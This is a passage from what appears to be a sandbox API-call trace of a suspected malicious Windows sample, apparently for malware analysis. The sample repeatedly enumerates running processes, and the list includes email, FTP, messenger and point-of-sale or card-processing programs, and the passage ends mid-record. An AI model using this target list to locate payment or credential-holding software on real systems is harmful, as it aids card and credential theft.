[0292.497] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0292.499] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0292.501] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0292.503] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0292.505] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0292.507] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0292.509] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0292.511] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0292.513] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0292.515] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0292.516] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0292.518] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0292.520] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0292.521] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0292.523] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0292.524] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0292.526] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0292.588] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0292.590] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0292.592] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0292.593] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0292.595] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0292.596] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0292.598] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0292.599] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0292.601] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0292.603] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0292.604] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0292.606] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0292.608] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0292.609] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0292.611] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0292.612] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0292.614] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0292.615] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0292.617] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.618] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.620] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0292.621] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0292.622] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0292.664] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0292.666] CloseHandle (hObject=0x2134) returned 1 [0292.666] Sleep (dwMilliseconds=0x64) [0292.829] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0292.839] Process32First (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.844] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.846] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.847] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.849] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.851] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.852] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.854] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.855] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.860] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.862] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.864] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.866] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.868] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.870] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.930] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.932] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.934] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.935] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.937] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.939] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0292.940] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0292.942] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.943] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.945] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0292.946] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0292.947] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0292.949] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.951] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0292.953] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0292.954] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.956] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.957] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0292.958] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0292.960] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0292.961] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0292.962] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0292.964] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0292.971] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0292.972] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0292.974] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0292.975] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, 